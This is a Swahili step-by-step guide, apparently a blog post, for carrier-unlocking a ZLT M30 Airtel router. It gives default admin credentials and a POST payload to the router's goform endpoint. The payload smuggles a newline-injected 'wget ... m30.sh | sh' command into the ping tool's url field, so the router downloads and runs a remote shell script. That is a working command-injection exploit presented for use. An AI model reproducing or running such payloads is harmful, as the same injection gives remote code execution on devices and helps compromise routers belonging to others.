Jinsi ya kuunlock ZLT M30 Airtel Itumie mitandao yote
Hii ni router ambayo inatumia SIM Card ya mtandao mmoja wa Airtel kwahiyo kwa kutumia njia hii utaweza kuunlock router yako ya ZLT M30 Airtel na utaweza kutumia SIM Card ya mtandao wowote ule unaoutaka
Unatakiwa uwe na file hizi
Nimekuwekea maelezo pamoja na video za kuunlock
Namna ya kuunlock ZLT M30 Airtel itumie mitandao yote
Download and Install "WebSpy" extension kwenye chrome. Unganisha computer yako na internet
Bonyeza vidoti 3 Bonyeza extension >>> Visit Chrome Web Store Andika webspy kisha bonyeza enter Bonyeza kwenye WebSpy Bonyeza kwenye Add to Chrome Bonyeza Add extension Unganisha router yako ZLT M30 kwa WIFI ikiwa ina SIM Card au haina Kwenye address bar ya browser yako andika 192.168.1.1 kisha bonyeza enter Username: rootPassword: admin
Bonyeza Log in
Itafunguka kama hiviFungua folder la file lako kisha run the http.cmd Minimize Kwenye Google Chrome, bonyeza F12 (short key) au fungua Chrome menu kwa kubonyeza vidoti 3 > More tools > Developer tools Bonyeza More tabs Bonyeza Spy Bonyeza the +new button Bonyeza kwenye Request Chagua POST
Kwenye URL weka http://192.168.1.1/goform/goform_get_cmd_process Kwenye Request Header weka hizo code kisha bonyeza Send isTest=false&cmd=network_tools&pingTimes=1&url=127.0.0.1\nwget http://192.168.1.179/m30.sh -0 - | sh&port=-1&subcmd=1 Subiri mpaka imalize yenyewe Bonyeza OK Username: admin
Password: admin
Bonyeza Login
Itafunguka kama hiviMpaka hapo utakuwa umefanikiwa kuunlock ZLT M30 Airtel na utaweza kutumia SIM Card ya mtandao wowote ule unaoutaka
Post a Comment